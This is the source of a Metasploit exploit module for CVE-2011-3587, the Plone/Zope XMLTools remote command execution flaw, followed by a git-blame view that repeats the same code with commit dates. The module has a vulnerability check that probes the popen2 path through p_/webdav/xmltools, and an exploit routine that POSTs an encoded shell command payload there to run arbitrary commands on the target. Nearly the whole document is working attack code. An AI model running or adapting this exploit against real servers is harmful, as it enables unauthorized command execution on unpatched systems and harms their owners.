metasploit-framework/modules/exploits/multi/http/plone_popen2.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Plone and Zope XMLTools Remote Command Execution',
      'Description'    => %q{
        Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
        through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
        arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
        the use of Python modules.

      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Plone Security team',  # Vulnerability discovery
          'Nick Miles',           # Original exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2011-3587'],
          ['OSVDB', '76105'],
          ['EDB', '18262'],
          ['URL', 'http://plone.org/products/plone/security/advisories/20110928']
        ],
      'Privileged'     => false,
      'Payload'        =>
      {
        'Compat'     =>
        {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic telnet perl ruby python',
        }
      },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 04 2011',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('URI',[true, "The path to the Plone installation", "/"]),
      ],self.class)
    register_autofilter_ports([ 8080 ])
  end

  def check
    uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')

    res = send_request_raw(
      {
        'uri'       => uri
      }, 25)
    if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
      return Exploit::CheckCode::Vulnerable
    end
    # patched == zExceptions.NotFound
    return Exploit::CheckCode::Safe
  end

  def exploit
    uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')

    send_request_cgi(
      {
        'method'    => 'POST',
        'uri'       => uri,
        'vars_post' =>
          {
            'cmd' => payload.encoded,
          }
      }, 0.5) # short timeout, we don't care about the response
  end
end
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Plone and Zope XMLTools Remote Command Execution',`
			`'Description' => %q{`
			`Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x`
			`through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute`
			`arbitrary commands via vectors related to the p_ class in OFS/misc_.py and`
			`the use of Python modules.`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Plone Security team', # Vulnerability discovery`
			`'Nick Miles', # Original exploit`
			`'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module`
			`],`
			`'References' =>`
			`[`
			`['CVE', '2011-3587'],`
			`['OSVDB', '76105'],`
			`['EDB', '18262'],`
			`['URL', 'http://plone.org/products/plone/security/advisories/20110928']`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic telnet perl ruby python',`
			`}`
			`},`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 17:33:31 +00:00			`'Platform' => %w{ linux unix },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Arch' => ARCH_CMD,`
			`'Targets' => [['Automatic',{}]],`
			`'DisclosureDate' => 'Oct 04 2011',`
			`'DefaultTarget' => 0`
			`))`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(8080),`
			`OptString.new('URI',[true, "The path to the Plone installation", "/"]),`
			`],self.class)`
			`register_autofilter_ports([ 8080 ])`
			`end`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`res = send_request_raw(`
			`{`
			`'uri' => uri`
			`}, 25)`
			`if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)`
			`return Exploit::CheckCode::Vulnerable`
			`end`
			`# patched == zExceptions.NotFound`
			`return Exploit::CheckCode::Safe`
			`end`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`send_request_cgi(`
			`{`
			`'method' => 'POST',`
			`'uri' => uri,`
			`'vars_post' =>`
			`{`
			`'cmd' => payload.encoded,`
			`}`
			`}, 0.5) # short timeout, we don't care about the response`
			`end`
Add CVE-2011-3587 Plone/Zope Remote CMD Injection (Feature #6151) 2011-12-27 06:59:26 +00:00			`end`